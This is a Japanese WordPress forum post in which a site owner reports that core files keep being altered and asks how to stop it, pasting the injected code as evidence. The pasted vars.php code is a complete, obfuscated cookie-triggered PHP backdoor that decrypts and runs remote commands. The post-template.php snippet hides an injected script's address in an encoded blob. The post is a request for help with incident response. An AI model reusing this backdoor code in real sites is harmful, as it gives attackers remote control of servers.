vars.phpとpost-template.phpへのスパム?
-
【現象】
vars.phpとpost-template.phpへのスパムだと思います。
/wp-includes/vars.php、post-template.phpが勝手に書き換えられて非常に困ってます。【調べてみました】
・googleで以下のワードで検索しましたが、全くヒットしません。
「wordpress vars.php スパム」、「wordpress vars.php コード 勝手に挿入される」・海外のフォーラムに同じ事象の投稿がありましたが、(なぜかキャッシュですが)まだ未回答のままかと思います。
http://webcache.googleusercontent.com/search?q=cache:yLngLEOr3gsJ:https://wordpress.org/support/topic/code-is-injected-in-varsphp+&cd=1&hl=ja&ct=clnk&gl=jp【挿入されるコード】
【vars.phpに挿入されるコード】
==============================================================================function sdec($inp) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $out = ""; $inp = preg_replace("[^A-Za-z0-9\+\/\=]", "", $inp); do { $enc1 = strpos($keyStr, substr($inp, $i++, 1)); $enc2 = strpos($keyStr, substr($inp, $i++, 1)); $enc3 = strpos($keyStr, substr($inp, $i++, 1)); $enc4 = strpos($keyStr, substr($inp, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $out = $out . chr((int) $chr1); if ($enc3 != 64) { $out = $out . chr((int) $chr2); } if ($enc4 != 64) { $out = $out . chr((int) $chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($inp)); return $out; } if(substr(md5(reset($_COOKIE)), 0, 12)=='bc446faa565e' && count($_COOKIE)>3) { $k = substr(md5(reset($_COOKIE), true), 0, 6).substr(md5(reset($_COOKIE), true), -6); $ko = substr(md5(reset($_COOKIE)), -12); $lmf = str_rot13(str_replace('c', '', 'pecrncgr_cshcacpgcvbac')); $vlm = $lmf('$t,$k','$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;'); ob_start(); array_diff_ukey(@array('1'=>1), @array('2'=>2), $lmf('', @gzuncompress(@$vlm(@sdec(preg_replace(array("/_/","/-/"),array("/","+"),join(array_slice($_COOKIE,count($_COOKIE)-3)))),$k)))); $o=ob_get_contents(); ob_end_clean(); $d=base64_encode($vlm(gzcompress($o),$k)); print("\x3c$ko\x3e$d\x3c\x2f$ko\x3e"); }
【post-template.phpに挿入されるコード】
==============================================================================function wp_scripts_method() { wp_enqueue_script( 'jquery-lcr', gzuncompress(base64_decode('eJzT189JLUlOLMrXqzAyySjSS87P1c8q1k/OLy1JLdLLKgYAtu4LdA==')), array(), "\x32\x2e\x30\x2e\x31\x26\x74\x3d".time()); } add_action( 'wp_enqueue_scripts', 'wp_scripts_method');
ただし、私が見つけられた怪しいと思われるコードは以上で、
他のファイルにも書き込まれているかもしれません。【環境】
ホスティング:さくらサーバー
wordpress:4.3
使用しているテーマ:twentytwelve【取ってみた対策(ダメでしたが)】
wordpressをインストールする際に
一般的にセキュリティ効果のあるとされているパーミッションに変更
.htaccess 604
wp-config.php 404
他ディレクトリ 705
他ファイル 604wordpressを新規にダウンロードし、ファイルを差し替えてパーミッションを
http://wpdocs.osdn.jp/Hardening_WordPressのファイルパーミッションを参考に変更いたしました。上記対策を行った上でこれ以上どのような対策をとればいいのか
検討がつきません。=====================================
なんども書き換えられる事からどっかのセキュリティーホールが空きっぱなしという事も思ったりするのですが、どうしたらいいでしょうか?
モデレーター編集: フォーラムカテゴリーを『【重要】 お読みください』から『使い方全般』へ移動。『【重要】 お読みください』はフォーラム運営上のお知らせを掲載するカテゴリーです。一般の投稿は内容に合ったその他のカテゴリーへ投稿してください。]
- トピック「vars.phpとpost-template.phpへのスパム?」には新たに返信することはできません。